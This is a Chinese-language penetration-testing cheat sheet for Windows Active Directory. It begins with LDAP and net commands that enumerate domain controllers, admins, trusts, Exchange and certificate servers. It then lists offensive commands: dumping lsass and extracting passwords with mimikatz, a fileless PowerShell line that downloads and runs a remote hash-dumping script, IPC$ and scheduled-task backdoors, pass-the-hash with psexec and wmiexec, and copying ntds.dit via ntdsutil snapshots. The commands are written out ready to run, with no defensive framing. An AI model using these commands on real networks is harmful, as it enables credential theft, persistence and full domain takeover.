信息收集基础命令
查询与控制器主机名
net group "domain controllers" /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "OU=Domain Controllers,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306369)"|grep dNSHostName
查询域管理用户
net group "domain admins" /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Domain Admins,CN=users,DC=test,DC=com" -w Uu1234. "(member=*)"|grep member:
查看所有域用户
net user /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Users,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306368)"|grep sAMAccountName
查看加入域的所有计算机名
net group "domain computers" /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Computers,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306369)"|grep dNSHostName
查看域密码策略
net accounts /domain
查看域信任关系
nltest /domain_trusts /all_trusts /v /server:xx.xx.xx.xx
powershell ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest','test.com')))).GetAllTrustRelationships()
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(objectClass=trustedDomain)"|grep trustPartner:
查看信任方向
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(objectClass=trustedDomain)"|grep trustDirection:
1 | 2 | 3 |
---|---|---|
受信任的域信任主域执行操作 | 主域信任受信任的域执行操作 | 相互信任 |
在nltest中
Inbound | Outbound |
---|---|
受信任的域信任主域执行操作 | 主域信任受信任的域执行操作 |
定位exchange服务器
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=test,DC=com" -w Uu1234. "(sAMAccountType=268435456)"|grep member
setspn -q exchangemdb/*
定位adcs服务
ldapsearch -x -H ldap://192.168.164.146 -D "user1@test.com" -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=test,DC=com" -w Uu1234. "(objectCategory=pKIEnrollmentService)"|grep dNSHostName
常用工具
使用procdump将目标的lsass.exe转储成dmp文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
使用mimikatz从转储的lsass.dmp中来读取明文密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
使用powershell无文件落地
powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1’);Get-PassHashes
利用ipc$链接获得shell
net use \192.168.91.131\IPC$ /user:"administrator" "abc@123"
copy D:\test.bat \192.168.91.131\c$
计划任务后门
schtasks /create /s 192.168.91.131 /u Administrator /p Admin@123.. /ru "SYSTEM" /tn test /sc DAILY /st 22:18 /tr C:\windows\temp\test.bat /F
创建计划任务,/tn是任务名称,/sc是任务运行频率,这里指定为每天运行, /tr指定运行的文件,/F表示强制创建任务 /i表示立即执行
使用psexec
psexec.exe admin@10.73.147.30 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de -accepteula
python psexec.py administrator@10.73.147.29 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de
python psexec.py domain.com/administrator:password@10.73.147.29
wmiexec
python wmiexec.py -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de administrator@10.73.147.29
wmic /node:10.73.147.29 /user:Administrator /password:Admin@123.. process call create "cmd.exe /c ipconfig"
winrm
winrs -r:http://10.73.147.29:5985 -u:Administrator -p:Admin@123.. "whoami /all"
winrs -r:http://10.73.147.29:5985 -u:Administrator -p:Admin@123.. "cmd.exe"
在域控导出hash
创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
加载快照
ntdsutil snapshot "mount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit
Copy文件副本
copy C:\$SNAP_201911211122_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
卸载删除快照
ntdsutil snapshot "unmount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit
ntdsutil snapshot "delete {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit